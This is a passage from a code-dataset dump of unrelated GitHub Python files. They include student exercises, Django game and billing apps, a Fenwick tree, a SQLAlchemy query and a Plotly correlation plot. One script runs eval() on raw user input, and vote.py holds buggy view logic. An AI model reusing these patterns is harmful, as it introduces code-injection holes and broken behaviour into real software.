(70, 80, 90)]\n# Expected Output: [(10, 20, 100), (40, 50, 100), (70, 80, 100)]\nimport os\nos.system(\"cls\")\nx= eval(input(\"Enter a list:- \"))\nfor i in range(len(x)):\n temp_list= list(x[i])\n temp_list[-1]= 100\n x[i]= tuple(temp_list)\nprint(x)","repo_name":"Awesome-Abhay/Python-Programs","sub_path":"new23.py","file_name":"new23.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5181837053","text":"# Łukasz Wilański\nfrom kol1testy import runtests\n\n# Algorytm dla każdego składnika sumy tworzy podzbiór z którego w którym będzie znajdywał k-ty największy element.\n# Aby znaleźć ten element korzysta z funkcji partition i wykonuje ją dopóki szukany element będzie równy pivotovi\n# Złożoność czasowa O(np) złożoność pamięciowa O(1)\n\ndef partition(A, l, r):\n pivot = A[r]\n i = l - 1\n for j in range(l, r):\n if A[j] <= pivot:\n i += 1\n A[i], A[j] = A[j], A[i]\n A[i + 1], A[r] = A[r], A[i + 1]\n return i + 1\n\ndef ksum(T, k, p):\n wyn = 0\n for i in range(0, len(T) - p + 1):\n arr = []\n for j in range(i, i + p):\n arr.append(T[j])\n\n s = 0\n e = len(arr) - 1\n while True:\n v = partition(arr, s, e)\n if v > len(arr) - k:\n e = v - 1\n elif v < len(arr) - k:\n s = v + 1\n if v==len(arr)-k:\n break\n wyn += arr[v]\n return wyn\n\n\n# zmien all_tests na True zeby uruchomic wszystkie testy\nruntests(ksum, all_tests=True)\n\n\n","repo_name":"youngbucu/Studia","sub_path":"ASD/kol1/kol1.py","file_name":"kol1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32918620732","text":"from django.conf.urls.defaults import *\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('assassins_manager.services',\n url(r'^cron/$', 'game_cron'),\n )\nurlpatterns += patterns('assassins_manager.views',\n url(r'^info/$', 'about', name='about'),\n )\nurlpatterns += patterns('assassins_manager.game.views',\n url(r'^(?P.+)/details/$', 'details', name='game_details'),\n url(r'^(?P.+)/join/$', 'join_game', name='game_join'),\n url(r'^(?P.+)/leave/$', 'leave_game', name='game_leave'),\n url(r'^(?P.+)/scoreboard/$', 'scoreboard', name='game_scoreboard'),\n url(r'^(?P.+)/a/(?P\\d+)/$', 'assassins'),\n url(r'^(?P.+)/a/$', 'assassins', name='game_assassins_list'),\n url(r'^(?P.+)/p/$', 'police', name='game_police_list'),\n url(r'^(?P.+)/d/$', 'disavowed', name='game_disavowed_list'),\n url(r'^(?P.+)/s/$', 'squads', name='game_squads_list'),\n url(r'^(?P.+)/c/$', 'contracts', name='game_contracts_list'),\n url(r'^(?P.+)/admin/start_game/$', 'start_game', name='game_start'),\n url(r'^(?P.+)/admin/end_game/$', 'end_game', name='game_end'),\n url(r'^(?P.+)/admin/reset_game/$', 'reset_game', name='game_reset'),\n url(r'^(?P.+)/admin/delete_game/$', 'delete_game', name='game_delete'),\n url(r'^(?P.+)/admin/add_police/$', 'add_police', name='police_add'),\n url(r'^(?P.+)/admin/remove_police/$', 'remove_police', name='police_remove'),\n url(r'^(?P.+)/admin/$', 'game_admin', name='game_admin'),\n url(r'^create_game/$', 'create_game', name='game_create'),\n url(r'^$', 'gamelist', name='game_list'),\n )\nurlpatterns += patterns('assassins_manager.squad.views',\n url(r'^(?P.+)/s/details/(?P\\d+)/$', 'details', name='squad_details'),\n url(r'^(?P.+)/s/details/$', 'my_details', name='my_squad_details'),\n url(r'^(?P.+)/s/contracts/$', 'my_contracts', name='my_contracts'),\n url(r'^(?P.+)/s/add_squad/$', 'add_squad', name='squad_add'),\n url(r'^(?P.+)/s/join_squad/$', 'join_squad', name='squad_join'),\n url(r'^(?P.+)/s/leave_squad/$', 'leave_squad', name='squad_leave'),\n )\nurlpatterns += patterns('assassins_manager.assassin.views',\n url(r'^(?P.+)/a/details/(?P.+)/$', 'details', name='assassin_details'),\n url(r'^(?P.+)/a/details/$', 'my_details', name='my_details'),\n )\nurlpatterns += patterns('assassins_manager.kill.views',\n url(r'^(?P.+)/report_kill/$', 'report_kill', name='report_kill'),\n url(r'^(?P.+)/report_kill_admin/$', 'report_kill_admin', name='report_kill_admin'),\n url(r'^report_kill_text/(?P.+)/(?P.+)/$', 'report_kill_text', name='report_kill_text'),\n url(r'^text/$', 'text', name='text'),\n )\nurlpatterns += patterns('assassins_manager.contract.views',\n url(r'^(?P.+)/c/details/(?P\\d+)/$', 'details', name='contract_details'),\n )\nurlpatterns += patterns('assassins_manager.report.views',\n url(r'^(?P.+)/r/k/(?P.+)/$', 'playerkills', name='player_kills'),\n url(r'^(?P.+)/r/d/(?P.+)/$', 'playerdeaths', name='player_deaths'),\n url(r'^(?P.+)/r/(?P\\d+)/$', 'killreport', name='kill_report'),\n url(r'^(?P.+)/r/$', 'killreports', name='game_kills'),\n )\n","repo_name":"rbtying/cuassassins","sub_path":"assassins_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40441609225","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\n\nfrom base.models import CustomUser, Notification, Transaction\n\n# Create your views here.\ndef get_notifications(request):\n if not request.user.is_authenticated:\n return redirect(\"/\")\n\n consumer = CustomUser.objects.get(id=request.user.id)\n notifications = Notification.objects.all().filter(user_id=consumer.id).order_by( 'status', '-created_on',)\n\n data = {\n \"consumer\": consumer,\n \"notifications\": notifications\n }\n\n return render(request, \"./base/consumer/notifications.html\", data)\n\ndef get_transaction_history(request):\n if not request.user.is_authenticated:\n return redirect(\"/\")\n\n consumer = CustomUser.objects.get(id=request.user.id)\n transactions = Transaction.objects.all().filter(user_id=consumer.id).order_by('-created_on',)\n\n data = {\n \"consumer\": consumer,\n \"transactions\": transactions\n }\n\n return render(request, \"./base/consumer/transaction-history.html\", data)","repo_name":"clarkjanndy/water-billing-system","sub_path":"base/views/notification_views.py","file_name":"notification_views.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920463491","text":"import torch\n\n\nclass NcnnDetectionOutputOp(torch.autograd.Function):\n \"\"\"Create DetectionOutput op.\n\n A dummy DetectionOutput operator for ncnn end2end deployment.\n It will map to the DetectionOutput op of ncnn. After converting\n to ncnn, DetectionOutput op of ncnn will get called\n automatically.\n\n Args:\n loc (Tensor): The predicted boxes location tensor.\n conf (Tensor): The predicted boxes confidence of\n num_classes.\n anchor (Tensor): The prior anchors.\n score_threshold (float): Threshold of object\n score.\n Default: 0.35.\n nms_threshold (float): IoU threshold for NMS.\n Default: 0.45.\n nms_top_k (int): Number of bboxes after NMS.\n Default: 100.\n keep_top_k (int): Max number of bboxes of detection result.\n Default: 100.\n num_class (int): Number of classes, includes the background\n class.\n Default: 81.\n \"\"\"\n\n @staticmethod\n def symbolic(g,\n loc,\n conf,\n anchor,\n score_threshold=0.35,\n nms_threshold=0.45,\n nms_top_k=100,\n keep_top_k=100,\n num_class=81,\n target_stds=[0.1, 0.1, 0.2, 0.2]):\n \"\"\"Symbolic function of dummy onnx DetectionOutput op for ncnn.\"\"\"\n return g.op(\n 'mmdeploy::DetectionOutput',\n loc,\n conf,\n anchor,\n score_threshold_f=score_threshold,\n nms_threshold_f=nms_threshold,\n nms_top_k_i=nms_top_k,\n keep_top_k_i=keep_top_k,\n num_class_i=num_class,\n vars_f=target_stds,\n outputs=1)\n\n @staticmethod\n def forward(ctx,\n loc,\n conf,\n anchor,\n score_threshold=0.35,\n nms_threshold=0.45,\n nms_top_k=100,\n keep_top_k=100,\n num_class=81,\n target_stds=[0.1, 0.1, 0.2, 0.2]):\n \"\"\"Forward function of dummy onnx DetectionOutput op for ncnn.\"\"\"\n return torch.rand(1, 100, 6)\n\n\nncnn_detection_output_forward = NcnnDetectionOutputOp.apply\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmdet/ops/detection_output.py","file_name":"detection_output.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"11420466266","text":"from .helper import *\n\n\ndef voteCat(request, cat_id, vote):\n\tif request.method != 'POST':\n\t\treturn HttpResponse(400)\n\tif is_lazy_user(request.user):\n\t\treturn HttpResponse(400)\n\ttry:\n\t\tc_objs = Category.objects.get(Cid=cat_id)\n\texcept Exception as e:\n\t\treturn HttpResponse(400)\n\n\tCV_objs = CategoryVotes.objects.filter(Q(Uid=request.user) & Q(Cid=c_objs))\n\tCV_len = len(CV_objs)\n\tif CV_len < 1:\n\t\tobj = CategoryVotes.objects.create(Cid=c_objs, Uid=request.user, vote=vote - 10)\n\t\tobj.save()\n\telif CV_len == 1:\n\t\tCV_objs.vote = vote - 10\n\t\tCV_objs.save()\n\treturn HttpResponse(200)\n\ndef voteQuestion(request, q_id, vote):\n\tif request.method != 'POST':\n\t\treturn HttpResponse(404)\n\tif is_lazy_user(request.user):\n\t\treturn HttpResponse(400)\n\ttry:\n\t\tq_objs = Question.objects.get(Qid=q_id)\n\texcept Exception as e:\n\t\treturn HttpResponse(400)\n\tQV_objs = QuestionVotes.objects.filter(Q(Uid=request.user) & Q(Qid=q_objs))\n\tQV_len = len(QV_objs)\n\tif QV_len < 1:\n\t\tobj = QuestionVotes.objects.create(Qid=q_objs, Uid=request.user, vote=vote - 10)\n\t\tobj.save()\n\n\telif QV_len == 1:\n\t\tQV_objs.vote = vote - 10\n\t\tQV_objs.save()\n\n\treturn HttpResponse(200)\n\n\ndef stateCategory(request, c_id, state):\n\tif request.method != 'POST' or not request.user.is_staff:\n\t\treturn redirect(\"moderator\")\n\tcat_obj = Category.objects.get(c_id=c_id)\n\tstat_obj = State.objects.get(Sdescription=state)\n\tcat_obj.STid = stat_obj\n\treturn\n\n\ndef stateQuestion(request, q_id, state):\n\tif request.method != 'POST' or not request.user.is_staff:\n\t\treturn\n\tquestion_obj = Question.objects.get(q_id=q_id)\n\tstat_obj = State.objects.get(Sdescription=state)\n\tquestion_obj.STid = stat_obj\n\treturn\n","repo_name":"tringers/kwiss.it","sub_path":"kwiss_it/views/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2071443953","text":"#Fenwick Tree distributes partial sum to a series of slots which satifsfiies i += lowbit(i), \n#where i is the index in BIT array.\n\n#2D Fenwick Tree has a 2D spatial distribution, and the contributing slots are all possible combinations of two sets x and y, \n#where x = [ i += lowbit(i) ], y = [ j +=lowbit(j) ]. Therefore, we need a nested for loop to update self.bit[i][j]\n\n\nclass NumMatrix(object):\n def __init__(self, matrix):\n if not matrix or not matrix[0]:\n return\n self.matrix = matrix\n self.m= len(matrix)\n self.n= len(matrix[0])\n self.bit= [[0]*(self.n+1) for _ in range(self.m+1)]\n\n for i in range(self.m):\n for j in range(self.n):\n self.add(i+1 ,j+1 ,matrix[i][j])\n #Fenwick Tree index starting from 1\n \n #add delta to the Fenwich Tree\n def add(self,i,j,delta):\n x, y =[], []\n\n while i<=self.m:\n x.append(i)\n i+= i&-i\n\n while j<=self.n:\n y.append(j)\n j+= j&-j\n\n for i in x:\n for j in y:\n self.bit[i][j] += delta\n \n #cum sum from (0,0) to (i,j)\n def query(self,i,j):\n x, y =[], []\n\n while i>0:\n x.append(i)\n i-= i&-i\n\n while j>0:\n y.append(j)\n j-= j&-j\n\n return sum(self.bit[i][j] for i in x for j in y)\n \n #update with absolute value \n def update(self, row, col, val):\n delta = val - self.matrix[row][col]\n self.matrix[row][col] = val\n self.add(row +1,col+1, delta)\n\n #area from top-left (row1, col1) to bottom-right (row2+1, col2+1)\n #need add 1 to row2, col2, because Fenwick tree index starts from 1.\n def sumRegion(self, row1, col1, row2, col2):\n row2, col2 = row2+1, col2+1\n return self.query(row2,col2) + self.query(row1,col1) \\\n -self.query(row1,col2) - self.query(row2,col1)\n \n \n \n","repo_name":"mcfair/Algo","sub_path":"Fenwick Tree/308. Range Sum Query 2D - Mutable.py","file_name":"308. Range Sum Query 2D - Mutable.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33517815643","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Jan 13, 2013\n'''\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql.expression import label, case\nfrom smarter.reports.helpers.constants import Constants, AssessmentType\nfrom edapi.cache import cache_region\nfrom sqlalchemy.sql.functions import count\nfrom edcore.database.edcore_connector import EdCoreDBConnection\n\nBUCKET_SIZE = 20\n\n\n@cache_region('public.data')\ndef get_summary_distribution(state_code, district_id=None, school_id=None, asmt_type=AssessmentType.SUMMATIVE):\n '''\n Get a bucketed distribution of scores\n '''\n with EdCoreDBConnection(state_code=state_code) as connection:\n fact_asmt_outcome_vw = connection.get_table('fact_asmt_outcome')\n # should it be always for summative?\n query = select([label(Constants.SCORE_BUCKET, (fact_asmt_outcome_vw.c.asmt_score / get_bucket_size()) * get_bucket_size()),\n count(case([(fact_asmt_outcome_vw.c.asmt_subject == Constants.MATH, 1)], else_=0)).label(Constants.TOTAL_MATH),\n count(case([(fact_asmt_outcome_vw.c.asmt_subject == Constants.ELA, 1)], else_=0)).label(Constants.TOTAL_ELA)],\n from_obj=[fact_asmt_outcome_vw])\n query = query.where(fact_asmt_outcome_vw.c.state_code == state_code)\n query = query.where(fact_asmt_outcome_vw.c.asmt_type == asmt_type)\n query = query.where(fact_asmt_outcome_vw.c.rec_status == Constants.CURRENT)\n if (district_id is not None):\n query = query.where(fact_asmt_outcome_vw.c.district_id == district_id)\n if (school_id is not None):\n query = query.where(fact_asmt_outcome_vw.c.school_id == school_id)\n query = query.group_by(Constants.SCORE_BUCKET).order_by(Constants.SCORE_BUCKET)\n return connection.get_result(query)\n\n\ndef get_bucket_size():\n return BUCKET_SIZE\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"smarter/smarter/reports/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39649143406","text":"import numpy as np\nimport pandas as pd\nimport plotly.io as pio\nimport plotly.graph_objects as go\nfrom plotly.subplots import make_subplots\nfrom PDSUtilities.plotly import apply_default\nfrom PDSUtilities.plotly import get_font\nfrom PDSUtilities.plotly import get_marker\nfrom PDSUtilities.plotly import update_layout\nfrom PDSUtilities.plotly import hex_to_rgb\nfrom PDSUtilities.plotly import rgb_to_hex\nfrom PDSUtilities.plotly import get_colors\nfrom PDSUtilities.plotly import update_title\nfrom PDSUtilities.plotly import update_width_and_height\nfrom PDSUtilities.pandas import get_numerical_columns\n\ndef get_labels(columns, labels):\n if isinstance(labels, list):\n message = \"Length of labels list must match length of columns list...\"\n assert len(columns) == len(labels), message\n labels = { f\"{columns[c]}\": labels[c] for c in range(len(columns))}\n return labels\n\ndef get_color(value, colors):\n rlo, glo, blo = colors[1]\n rhi, ghi, bhi = colors[0]\n fraction = (value + 1.0)/2.001\n r = rlo + int(np.round(fraction*(rhi - rlo)))\n g = glo + int(np.round(fraction*(ghi - glo)))\n b = blo + int(np.round(fraction*(bhi - blo)))\n return rgb_to_hex((r, g, b))\n\ndef get_scatter_text(x, y, text, font = {}):\n # TODO: Need to test for more than just list...\n x = x if isinstance(x, list) else [x]\n y = y if isinstance(y, list) else [y]\n return go.Scatter(x = x, y = y, text = text, textfont = font,\n mode = 'text', showlegend = False, hoverinfo = \"skip\",\n )\n\n# font\n# axis_font\n# hover_font\n# label_font\n# title_font\n#\n# tick_font\n# legend_font\n# subtitle_font\ndef plot_correlation_triangle(df, columns = None, labels = {},\n width = None, height = None, title = None, precision = 4,\n template = None, colors = 0, xangle = 45, yangle = 45,\n font = {}, axis_font = {}, hover_font = {}, label_font = {},\n title_font = {}):\n #\n font = apply_default(get_font(), font)\n axis_font = apply_default(font, axis_font)\n label_font = apply_default(font, label_font)\n label_font = apply_default(label_font, { 'color': \"#FFFFFF\" })\n #\n colors = get_colors(colors)\n colors = [hex_to_rgb(color) for color in colors]\n columns = get_numerical_columns(df, columns)\n labels = get_labels(columns, labels)\n rows = [columns[c] for c in range(1, len(columns) )]\n cols = [columns[c] for c in range(0, len(columns) - 1)]\n correlations = df[columns].corr()\n #\n fig = make_subplots(rows = len(rows), cols = len(cols),\n horizontal_spacing = 0.1/len(cols),\n vertical_spacing = 0.1/len(rows),\n shared_xaxes = True,\n shared_yaxes = True,\n # print_grid = True,\n )\n for r in range(len(rows)):\n for c in range(r + 1):\n value = correlations[cols[c]][rows[r]]\n fig.append_trace(\n go.Scatter(\n x = [0.0], y = [0.0],\n mode = 'markers+text',\n # Make a large square to fill the plot area\n # since we can't set the background color...\n marker = dict(\n symbol = \"square\",\n size = 1000,\n color = get_color(value, colors),\n ),\n hoverlabel = dict(font = hover_font),\n hovertemplate = f\"{rows[r]}
    {cols[c]}\",\n text = str(np.round(value, precision)),\n name = str(np.round(value, precision)),\n textfont = label_font,\n showlegend = False,\n ),\n r + 1, c + 1\n )\n fig.update_xaxes(range = [-1.0, 1.0])\n fig.update_yaxes(range = [-1.0, 1.0])\n fig.update_xaxes(showgrid = False, ticks = \"\", mirror = True)\n fig.update_yaxes(showgrid = False, ticks = \"\", mirror = True)\n fig.update_xaxes(linecolor = \"black\", linewidth = 0.5, zeroline = False)\n fig.update_yaxes(linecolor = \"black\", linewidth = 0.5, zeroline = False)\n # We use a single tick label as the axis label...\n for c in range(len(cols)):\n fig.update_xaxes(\n tickmode = \"array\",\n tickvals = [0.0],\n tickfont = axis_font,\n ticktext = [labels.get(cols[c], cols[c])],\n tickangle = -xangle,\n row = len(rows), col = c + 1,\n )\n for r in range(len(rows)):\n fig.update_yaxes(\n tickmode = \"array\",\n tickvals = [0.2 if yangle == 45 else 0.0],\n tickfont = axis_font,\n ticktext = [\n labels.get(rows[r], rows[r]) + \" \" if yangle == 45 else \" \"\n ],\n tickangle = -yangle,\n row = r + 1, col = 1,\n )\n #\n fig = update_width_and_height(fig, width, height)\n fig = update_title(fig, title, title_font, font)\n fig = update_layout(fig, font = font, template = template)\n return fig","repo_name":"DrJohnWagner/PDSUtilities","sub_path":"PDSUtilities/pandas/plot_correlation_triangle.py","file_name":"plot_correlation_triangle.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18534402601","text":"from calendar import monthrange\nfrom datetime import date\nfrom decimal import Decimal\n\nfrom django.template.defaultfilters import date as date_filter\nfrom django.conf import settings\nfrom django.db import models\nfrom django.db.models import F, Sum\nfrom django.contrib.auth import get_user_model\n\nMONTHS = {\n 1: 'Januar', 2: 'Februar', 3: 'März', 4: 'April', 5: 'Mai', 6: 'Juni',\n 7: 'July', 8: 'August', 9: 'September', 10: 'Oktober', 11: 'November',\n 12: 'December'\n}\n\nUser = get_user_model()\n\n\nclass Bill(models.Model):\n bill_date = models.DateField(blank=True, null=True)\n days_in_month = models.PositiveIntegerField(editable=False, verbose_name='Days/Mo')\n members = models.ManyToManyField(settings.AUTH_USER_MODEL)\n expense_types = models.ManyToManyField('ExpenseType')\n terra_daily_rate = models.DecimalField(max_digits=8, decimal_places=2, verbose_name='Terra Rate')\n total_attendance_days = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, verbose_name='Total Days')\n total_supermarket = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n total_invest = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n total_terra = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n total_luxury = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n daily_rate = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True)\n account_carry_over = models.OneToOneField('Account', blank=True, null=True, on_delete=models.SET_NULL)\n bill_carry_over = models.OneToOneField('Bill', blank=True, null=True, on_delete=models.SET_NULL)\n comment = models.TextField(blank=True, null=True)\n overview = models.TextField(blank=True, null=True)\n\n\n class Meta:\n ordering = ['-bill_date']\n verbose_name = 'Bill'\n\n def __str__(self):\n return \"Bill {}\".format(self.bill_date)\n\n def save(self, *args, **kwargs):\n self.days_in_month = monthrange(self.bill_date.year, self.bill_date.month)[1]\n super(Bill, self).save(*args, **kwargs)\n\n def generate_bill_overview(self):\n text = f\"### Essensabrechnung: {date_filter(self.bill_date, 'F Y')} \\n\\n\"\n text += f\"Summe Anwesenheitstage: {self.total_attendance_days:.2f}\\n\"\n text += f\"Summe Terra: {self.total_terra:.2f}€\\n\"\n text += f\"Summe Supermarkt: {self.total_supermarket:.2f}€\\n\"\n text += f\"Summe Invest: {self.total_invest:.2f}€\\n\"\n text += f\"Tagessatz (Terra): {self.daily_rate:.2f} € ({self.terra_daily_rate:.2f}€)\\n\\n\"\n text += \"| Name | Tage | Bezahlen/Guthaben | Kredit + Ausgaben - Essen - Invest - Luxus |\\n\"\n text += \"| :------------ |:---------------|:-----|:---------|\\n\"\n for user_bill in self.userbill_set.all().order_by('user__username'):\n text += f\"| **{user_bill.user}** | {user_bill.attendance_days:.1f} | \"\n if user_bill.get_user_has_to_pay_amount():\n text += f\"Zu bezahlen: **{user_bill.get_user_has_to_pay_amount():.2f}€** | {user_bill.credit:.2f} + {user_bill.expense_sum:.2f} - {user_bill.food_sum:.2f} - {user_bill.invest_sum:.2f} - {user_bill.luxury_sum:.2f} |\\n\"\n elif user_bill.get_user_credit():\n text += f\"Guthaben: {user_bill.get_user_credit():.2f}€ | {user_bill.credit:.2f} + {user_bill.expense_sum:.2f} - {user_bill.food_sum:.2f} - {user_bill.invest_sum:.2f} - {user_bill.luxury_sum:.2f} |\\n\"\n \n return text \n\n\n def make_bill_calculation(self):\n user_bills = self.userbill_set.all()\n # calculate totals of month and save in object\n total_attendance_days = user_bills.aggregate(total_attendance_days=Sum(F('attendance_days') * F('calculation_factor')))['total_attendance_days']\n total_luxury = user_bills.aggregate(Sum('luxury_sum'))['luxury_sum__sum'] or 0\n\n food_expense_types = ExpenseType.objects.filter(is_invest=False)\n invest_expense_types = ExpenseType.objects.filter(is_invest=True)\n\n all_food_expenses = Expense.objects.filter(expense_type__in=food_expense_types, user_bill__bill=self)\n total_supermarket = all_food_expenses.aggregate(Sum('amount'))['amount__sum'] or 0\n\n all_invest_expenses = Expense.objects.filter(expense_type__in=invest_expense_types, user_bill__bill=self)\n total_invest = all_invest_expenses.aggregate(Sum('amount'))['amount__sum'] or 0\n\n self.total_attendance_days = total_attendance_days\n self.total_supermarket = total_supermarket\n self.total_terra = total_attendance_days * self.terra_daily_rate\n self.total_invest = total_invest\n self.total_luxury = total_luxury\n self.daily_rate = (self.total_supermarket + self.total_terra) / self.total_attendance_days\n self.save()\n\n # calculate the share per user for the invest sum, respecting the calculation rate\n invest_share = self.total_invest / user_bills.filter(expense_types__in=invest_expense_types).aggregate(user_count=Sum('calculation_factor'))['user_count']\n # calculate user Food sum\n for user_bill in user_bills:\n user_credit = 0\n if self.account_carry_over and UserPayback.objects.filter(user=user_bill.user, account=self.account_carry_over).exists():\n # carry over positive and negative userpayback total\n user_credit += UserPayback.objects.get(user=user_bill.user, account=self.account_carry_over).total\n if self.bill_carry_over and UserBill.objects.filter(user=user_bill.user, bill=self.bill_carry_over).exists():\n last_user_bill = UserBill.objects.get(user=user_bill.user, bill=self.bill_carry_over)\n if last_user_bill.get_user_credit():\n user_credit += last_user_bill.get_user_credit()\n user_bill.credit = user_credit\n user_bill.food_sum = user_bill.calculation_factor * user_bill.attendance_days * user_bill.bill.daily_rate\n if user_bill.expense_types.filter(is_invest=True).exists():\n user_bill.invest_sum = invest_share * user_bill.calculation_factor\n else:\n user_bill.invest_sum = 0\n user_expense_food = all_food_expenses.filter(user_bill=user_bill).aggregate(Sum('amount'))['amount__sum'] or 0\n user_expense_invest = all_invest_expenses.filter(user_bill=user_bill).aggregate(Sum('amount'))['amount__sum'] or 0\n user_bill.total = user_bill.credit + user_expense_food + user_expense_invest - user_bill.food_sum - user_bill.invest_sum - user_bill.luxury_sum\n user_bill.expense_sum = user_expense_food + user_expense_invest\n user_bill.save()\n self.overview = self.generate_bill_overview()\n self.save(update_fields=['overview'])\n\n\nclass UserBill(models.Model):\n bill = models.ForeignKey('Bill', on_delete=models.PROTECT)\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.PROTECT)\n calculation_factor = models.DecimalField(max_digits=8, decimal_places=2, default=1, verbose_name='Calcf.')\n expense_types = models.ManyToManyField('ExpenseType')\n attendance_days = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, verbose_name='Attend. days')\n credit = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n food_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n luxury_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n invest_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n expense_sum = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n total = models.DecimalField(max_digits=8, decimal_places=2, null=True, blank=True, default=0)\n has_paid = models.BooleanField(default=False, verbose_name='Paid?')\n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n unique_together = ['bill', 'user']\n ordering = ['-bill__bill_date']\n verbose_name = 'User Bill'\n\n def __str__(self):\n return \"%s - %s\" % (self.bill, self.user)\n\n def get_user_has_to_pay_amount(self):\n return self.total <= 0 and abs(self.total) or None\n \n def get_user_credit(self):\n return self.total > 0 and abs(self.total) or None\n\n\nclass ExpenseType(models.Model):\n name = models.CharField(max_length=255)\n is_invest = models.BooleanField(default=False)\n\n class Meta:\n verbose_name = 'Expense Type'\n\n def __str__(self):\n return self.name\n\n\nclass Expense(models.Model):\n expense_type = models.ForeignKey(ExpenseType, on_delete=models.PROTECT)\n user_bill = models.ForeignKey(UserBill, on_delete=models.PROTECT)\n amount = models.DecimalField(max_digits=8, decimal_places=2)\n comment = models.TextField(blank=True, null=True)\n\n class Meta:\n verbose_name = 'Expense'\n\n\nclass Inventory(models.Model):\n inventory_date = models.DateField(default=date.today)\n sum_inventory = models.DecimalField(max_digits=8, decimal_places=2, help_text=\"incl. luxury\")\n sum_cash = models.DecimalField(max_digits=8, decimal_places=2)\n sum_luxury = models.DecimalField(max_digits=8, decimal_places=2)\n comment = models.TextField(blank=True, null=True)\n bills = models.ManyToManyField('Bill', blank=True)\n\n class Meta:\n ordering = ['-inventory_date']\n verbose_name = 'Inventory'\n verbose_name_plural = 'Inventories'\n\n def __str__(self):\n return \"Inventory: {}\".format(self.inventory_date)\n\n def get_previous_inventory(self):\n return Inventory.objects.filter(inventory_date__lt=self.inventory_date).first()\n\n\nclass TerraInvoice(models.Model):\n terra_invoice_date = models.DateField()\n invoice_number = models.CharField(max_length=255, blank=True, null=True)\n invoice_sum = models.DecimalField(max_digits=8, decimal_places=2)\n deposit_sum = models.DecimalField(max_digits=8, decimal_places=2)\n luxury_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_sum_7 = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n luxury_sum_19 = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n other_sum = models.DecimalField(max_digits=8, decimal_places=2, default=0, help_text=\"Other extraordinary sum wich should not be included in the terra factor.\")\n is_pumpwerk = models.BooleanField(default=True, verbose_name='Is pumpwerk order?')\n fee = models.PositiveSmallIntegerField(blank=True, null=True, verbose_name='Additional fee', default=1, help_text=\"Fee in percentage, e.g. 1 for 1% or 2 for 2%.\")\n\n class Meta:\n verbose_name = 'Terra Invoice'\n verbose_name_plural = 'Terra Invoices'\n ordering = ['-terra_invoice_date']\n\n def __str__(self):\n return \"Terra Invoice: {} {}\".format(self.invoice_number, self.terra_invoice_date)\n\n def save(self, *args, **kwargs):\n if not self.luxury_sum and (self.luxury_sum_7 or self.luxury_sum_19):\n self.luxury_sum = (self.luxury_sum_7 * Decimal(1.07)) + (self.luxury_sum_19 * Decimal(1.19))\n super().save(*args, **kwargs)\n\n @property\n def invoice_sum_plus_fee(self):\n if self.fee:\n return ((self.invoice_sum - (self.deposit_sum or 0) - (self.luxury_sum or 0)) * (Decimal(1.0) + self.fee / Decimal(100.0))).quantize(Decimal('0.01'))\n else:\n return self.invoice_sum\n\n\nclass Payment(models.Model):\n title = models.CharField(max_length=255)\n payment_date = models.DateField(default=date.today)\n payment_sum = models.DecimalField(max_digits=8, decimal_places=2, blank=True, null=True)\n bills = models.ManyToManyField('TerraInvoice')\n\n class Meta:\n verbose_name = 'Payment'\n verbose_name_plural = 'Payments'\n ordering = ['-payment_date']\n\n def __str__(self):\n return self.title\n\n\nclass Account(models.Model):\n title = models.CharField(max_length=255)\n inventory = models.ForeignKey('Inventory', on_delete=models.PROTECT, null=True, 